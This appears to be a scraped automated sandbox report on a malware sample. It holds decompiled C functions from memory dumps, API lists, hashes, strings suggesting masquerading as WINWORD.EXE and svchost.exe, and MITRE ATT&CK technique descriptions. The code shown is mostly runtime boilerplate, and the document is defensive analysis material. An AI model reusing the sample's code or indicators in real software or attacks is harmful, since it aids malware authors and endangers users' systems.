C-Code - Quality: 50%

			E6D86424B(long _a4) {
				long _t3;
				intOrPtr* _t7;

				_t7 =  *0x6d8c1048;
				if(_t7 == 0) {
					LeaveCriticalSection(0x6d8c1030);
					_t3 = WaitForSingleObjectEx( *0x6d8c102c, _a4, 0);
					EnterCriticalSection(0x6d8c1030);
					return _t3;
				}
				 *0x6d870168(0x6d8c1028, 0x6d8c1030, _a4);
				return  *_t7();
			}

0x6d86424f
0x6d864257
0x6d864278
0x6d864289
0x6d864290
0x00000000
0x6d864290
0x6d864268
0x00000000

APIs

SleepConditionVariableCS.KERNELBASE(?,6D8641E8,00000064), ref: 6D86426E
LeaveCriticalSection.KERNEL32(6D8C1030,?,?,6D8641E8,00000064,?,74B5EA30,?,6D8611AB,6D8C1A7C), ref: 6D864278
WaitForSingleObjectEx.KERNEL32(?,00000000,?,6D8641E8,00000064,?,74B5EA30,?,6D8611AB,6D8C1A7C), ref: 6D864289
EnterCriticalSection.KERNEL32(6D8C1030,?,6D8641E8,00000064,?,74B5EA30,?,6D8611AB,6D8C1A7C), ref: 6D864290

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 473249712d86331bd68a89354a520f67f796ade3510632af964357dd69a1f154
Instruction ID: 93a0c7a3fa101c11acf7e9d59e9d8fd32c93eebf4d60d76df5d56468c3c2539d
Opcode Fuzzy Hash: 473249712d86331bd68a89354a520f67f796ade3510632af964357dd69a1f154
Instruction Fuzzy Hash: 6BE06532802474EBCF021BA68C8CB9E3B79BB0F7A1B104411FA04A2200CB229810CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 03037372, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0303737B

Part of subcall function 03037F3F: HeapFree.KERNEL32(00000000,00000000,?,0303727A), ref: 03037F55
Part of subcall function 03037F3F: GetLastError.KERNEL32(?,?,0303727A), ref: 03037F67

_free.LIBCMT ref: 0303738E
_free.LIBCMT ref: 0303739F
_free.LIBCMT ref: 030373B0

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e9874623f81e4ce9139fa85776699842b6650e736a367328f38f30c26584217f
Instruction ID: 8e898445c29d6db73905fda1824d44da112b19019e823ef421b7dae6cf306fda
Opcode Fuzzy Hash: e9874623f81e4ce9139fa85776699842b6650e736a367328f38f30c26584217f
Instruction Fuzzy Hash: 7CE026B9C27634EE9712BF2CB9048993BB9B7D5B603010116E4247B21CDB390522EBC5

Uniqueness

Uniqueness Score: -1.00%

Function 6D867923, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D867923() {

				E6D867CC2( *0x6d8c1a3c);
				 *0x6d8c1a3c = 0;
				E6D867CC2( *0x6d8c1a40);
				 *0x6d8c1a40 = 0;
				E6D867CC2( *0x6d8c1728);
				 *0x6d8c1728 = 0;
				E6D867CC2( *0x6d8c172c);
				 *0x6d8c172c = 0;
				return 1;
			}

0x6d86792c
0x6d867939
0x6d86793f
0x6d86794a
0x6d867950
0x6d86795b
0x6d867961
0x6d867969
0x6d867972

APIs

_free.LIBCMT ref: 6D86792C

Part of subcall function 6D867CC2: HeapFree.KERNEL32(00000000,00000000,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?), ref: 6D867CD8
Part of subcall function 6D867CC2: GetLastError.KERNEL32(?,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?,?), ref: 6D867CEA

_free.LIBCMT ref: 6D86793F
_free.LIBCMT ref: 6D867950
_free.LIBCMT ref: 6D867961

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 94393892a679d471d7389661207167f50f2b7ac127f216884e1afbd9320eb17e
Instruction ID: a8be188f0729cebfdd84b0cc3062c1923a8a7a9b5190344390ede85c66f4dd2b
Opcode Fuzzy Hash: 94393892a679d471d7389661207167f50f2b7ac127f216884e1afbd9320eb17e
Instruction Fuzzy Hash: 23E086B5E04160FB8F519F199DCC7453EF1E72E7643426406E40002B14CB324413DFD4

Uniqueness

Uniqueness Score: -1.00%

Function 03036C76, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\Help\Windows\WINWORD.EXE, xrefs: 03036CB9, 03036CC0, 03036CF6

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID:
String ID: C:\Windows\Help\Windows\WINWORD.EXE
API String ID: 0-204361137
Opcode ID: e1bb7e85e4c62ad645afde82aa3b8093dd670883d7c5cc4691fdc579a3d1b7e9
Instruction ID: b1f6dd0b3d6ec0a9c116429db8b4fc30af2a5d8cf9909d399ef20685a0810045
Opcode Fuzzy Hash: e1bb7e85e4c62ad645afde82aa3b8093dd670883d7c5cc4691fdc579a3d1b7e9
Instruction Fuzzy Hash: C3415075E16219BFDB21EF99D8C0DAEBBFCEB86710B144066E415AB200D7729A40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D867038, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6D867038(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						_push(_t59);
						E6D8693C3(_t48, _t59);
						E6D868E04(_t57, 0, 0x6d8c1488, 0x104);
						_t26 =  *0x6d8c1730; // 0x1643638
						 *0x6d8c1720 = 0x6d8c1488;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6d8c1488;
							_v20 = 0x6d8c1488;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6D8672E5(E6D86716E( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6D86716E( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6D868CF7(_t48, 0, _t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6d8c1724 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6d8c1728 = _t58;
											L18:
											E6D867CC2(_t37);
											_v12 = 0;
											L19:
											E6D867CC2(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6d8c1724 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6d8c1728 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6D866A5B(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6D866A5B(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6D86699E();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x6d867038
0x6d867041
0x6d867046
0x6d867050
0x6d867053
0x6d867070
0x6d867070
0x6d867071
0x6d867084
0x6d867089
0x6d867091
0x6d867097
0x6d86709a
0x6d86709c
0x6d8670a3
0x6d8670a3
0x6d8670a5
0x6d8670a8
0x6d8670ab
0x6d8670b2
0x6d8670cb
0x6d8670d0
0x6d8670d2
0x6d8670f3
0x6d8670fb
0x6d8670fe
0x6d867119
0x6d86711c
0x6d867123
0x6d867127
0x6d867129
0x6d867130
0x6d867133
0x6d867135
0x6d867137
0x6d867139
0x6d867143
0x6d867143
0x6d867145
0x6d86714b
0x6d86714e
0x6d867150
0x6d867156
0x6d867157
0x6d86715d
0x6d867160
0x6d867161
0x6d867167
0x6d86716a
0x00000000
0x00000000
0x00000000
0x00000000
0x6d86713b
0x6d86713b
0x6d86713b
0x6d86713e
0x6d86713f
0x6d86713f
0x00000000
0x6d86713b
0x6d86712b
0x00000000
0x6d86712b
0x6d867103
0x6d867103
0x6d867104
0x6d867109
0x6d86710b
0x6d86710d
0x6d867112
0x6d867112
0x00000000
0x6d867112
0x6d8670d4
0x6d8670d9
0x6d8670db
0x6d8670dc
0x00000000
0x6d8670dc
0x6d86709e
0x6d8670a1
0x00000000
0x00000000
0x00000000
0x6d8670a1
0x6d867055
0x6d867058
0x00000000
0x00000000
0x6d86705a
0x6d867061
0x6d867062
0x6d867064
0x6d867069
0x00000000
0x6d867069
0x00000000

Strings

C:\Windows\Help\Windows\WINWORD.EXE, xrefs: 6D86707B, 6D867082, 6D8670B8

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\Help\Windows\WINWORD.EXE
API String ID: 0-204361137
Opcode ID: a8855e70195e9c320126c3327eb047436a43c99f000d9420f97c59dcd9bb7e5c
Instruction ID: 6e01404468199384537075d0340bd9363235799ef5e0d3220283aa060a1469fb
Opcode Fuzzy Hash: a8855e70195e9c320126c3327eb047436a43c99f000d9420f97c59dcd9bb7e5c
Instruction Fuzzy Hash: 574183B1E14299EBDB12CB9D8C88E9EBBF8EF89320F114866F50497640D7718A41C7F1

Uniqueness

Uniqueness Score: -1.00%

Function 03033230, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0303326F
__IsNonwritableInCurrentImage.LIBCMT ref: 03033323

Strings

csm, xrefs: 0303330D

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 95e876e8fbff18f529a0fb3dcc1a5ec9328b99bce20c6dcae1ef39241578a303
Instruction ID: da430467cc91366c6a51cddc26e4e2cec1717d1010a15c0c5069f972c90d048b
Opcode Fuzzy Hash: 95e876e8fbff18f529a0fb3dcc1a5ec9328b99bce20c6dcae1ef39241578a303
Instruction Fuzzy Hash: 0041C27CA02208ABCF10DF69C8C0ADEBBF9AF46214F1881D5E8159B351D7359A01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0304E000, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0304E03F
__IsNonwritableInCurrentImage.LIBCMT ref: 0304E0F3

Strings

csm, xrefs: 0304E0DD

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 99759f6fd2f402baa72d4a3d7d8b78b179f8606f02dc614000ee703c95d9db5f
Instruction ID: aafc212fbab892483f6a3f1d7490717d566da5ba95a06db6fe1b656ebfab1354
Opcode Fuzzy Hash: 99759f6fd2f402baa72d4a3d7d8b78b179f8606f02dc614000ee703c95d9db5f
Instruction Fuzzy Hash: 6D41B0B4A022189BCF10DF68C880ADEBBF5BF45364F1881B5E924AB391D7319B51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03065E00, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 03065E3F
__IsNonwritableInCurrentImage.LIBCMT ref: 03065EF3

Strings

csm, xrefs: 03065EDD

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: e1033b445011ec664d7027c08b3f5ef2303681d7ae0e9ab8bb06f2b21b3a1336
Instruction ID: 6d8d154081c4f9b5db904f8b35eb1e87b8f5c8aa73917dc22356208dfa239d34
Opcode Fuzzy Hash: e1033b445011ec664d7027c08b3f5ef2303681d7ae0e9ab8bb06f2b21b3a1336
Instruction Fuzzy Hash: 7A41AF34A023089BCF14DF68CC84ADEBBF5AF46224F188195E8189F399D731DA05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0304FB1A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 0304FC25

Strings

MOC, xrefs: 0304FB51
RCC, xrefs: 0304FB59

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: f94b04915f4234a4143f36e0f748e42c96bbefe463550c5a0bb3a9fd398d035d
Instruction ID: fcae9a691738c52a1e0213bee7a51c0cf16f66d6f284d1e4e86f246ca415d3b7
Opcode Fuzzy Hash: f94b04915f4234a4143f36e0f748e42c96bbefe463550c5a0bb3a9fd398d035d
Instruction Fuzzy Hash: 054159B690120AEFCF15DF98CD80AEEBBB5FF48314F1880A9F9056B211D3359A51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 030667F8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 03066903

Strings

RCC, xrefs: 03066837
MOC, xrefs: 0306682F

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 5205c645b221ac826937bf7a6a5dcb3dcdc24bc03e86e90f88a7140f791635fb
Instruction ID: 55ade9c1f9342ec8b2df75b059ff5b0b148c0fe63f466fc0d17d51cf9ea004dc
Opcode Fuzzy Hash: 5205c645b221ac826937bf7a6a5dcb3dcdc24bc03e86e90f88a7140f791635fb
Instruction Fuzzy Hash: 1A413D7190120DAFDF15DF98CD80AEEBBB9FF48304F188199F905AA254D3369960DB61

Uniqueness

Uniqueness Score: -1.00%

Function 03031020, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 03031043
_strrchr.LIBCMT ref: 03031052

Strings

svchost.exe, xrefs: 03031058

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: FileModuleName_strrchr
String ID: svchost.exe
API String ID: 1375183968-3106260013
Opcode ID: cbc45639113b57d55091dba1172332e7d2b9bb8378bf6a69451770e83e566935
Instruction ID: 3eb69e6e9fb4b7f29bd95b93b1cc4f588a4ee66a380fb72fdc89eb62393070a5
Opcode Fuzzy Hash: cbc45639113b57d55091dba1172332e7d2b9bb8378bf6a69451770e83e566935
Instruction Fuzzy Hash: 2DF027B8A063186AEB10FB759D06EEF77ACDB05300F4004A5A982D7181DAB48A454680

Uniqueness

Uniqueness Score: -1.00%

Function 6D861463, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D861463(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E6D8614B6(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0x6d860000;
				 *((intOrPtr*)(__ecx + 4)) = 0x6d860000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x6d8701c0;
				if(E6D861420(0x6d860000, __ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0x6d8c1a74 = 1;
				}
				return _t13;
			}

0x6d861464
0x6d861466
0x6d861470
0x6d861479
0x6d86147c
0x6d86147f
0x6d861486
0x6d861494
0x6d86149e
0x6d8614a5
0x6d8614a5
0x6d8614ab
0x6d8614ab
0x6d8614b5

APIs

Part of subcall function 6D861420: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,6D861492,?,?,?,6D861015), ref: 6D861425
Part of subcall function 6D861420: GetLastError.KERNEL32(?,?,?,6D861015), ref: 6D86142F

IsDebuggerPresent.KERNEL32(?,?,?,6D861015), ref: 6D861496
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6D861015), ref: 6D8614A5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6D8614A0

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 11a5bb6a79fdf92d09ef07ddc28879b179ffc2a366ad58cf3694009a3261c2dc
Instruction ID: 23f7355e5313f684e98e5b53900dc775c4efd5d43aa405a3e3dd46f6d084d572
Opcode Fuzzy Hash: 11a5bb6a79fdf92d09ef07ddc28879b179ffc2a366ad58cf3694009a3261c2dc
Instruction Fuzzy Hash: 61E039702047918BD7609F3AD10CB467BF5AB05324F008E1CD546C360AEBB9D048CBB2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 9nZ3r5ZN45

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Dropped Files

Sigma Overview

System Summary:

Signature Overview

